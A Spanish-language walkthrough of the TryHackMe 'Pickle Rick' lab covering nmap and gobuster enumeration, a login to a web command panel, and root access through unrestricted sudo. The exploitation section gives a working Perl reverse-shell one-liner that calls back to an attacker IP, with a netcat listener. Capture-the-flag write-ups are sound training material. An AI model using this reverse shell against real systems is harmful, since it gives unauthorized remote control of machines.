Pickle Rick

✍️ Autor: tryhackme, ar33zy, arebel 🔍 Dificultad: Fácil

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 10.10.146.162

para verificar la conectividad de red.

A continuación, se realiza el comando:

nmap 10.10.146.1626

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos, por lo que se procederá a indagar más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80 -v 10.10.146.162

para obtener más información sobre esos puertos específicamente.

Revisamos el puerto 80.

Revisando el código fuente hay algo relevante como un usuario.

Ahora buscaremos directorios con la herramienta Gobuster a través de:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml,js -u http://10.10.146.162

Encontramos una página de login y un robots.txt interesantes.

Nos logueamos con el usuario y contraseña descubierta anteriormente.

Es un panel de comandos por lo que listamos y vemos el contenido.

🚀 EXPLOTACIÓN

Como podemos ejecutar comandos para obtener una Reverse Shell.

nc -nlvp 4444
perl -e 'use Socket;$i="10.8.146.101";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar.

Comprobamos que tienen todos los permisos por lo que podemos ejecutar como root cualquier comando.

sudo ls /root/
sudo cat /root/3rd.txt

Last updated

Was this helpful?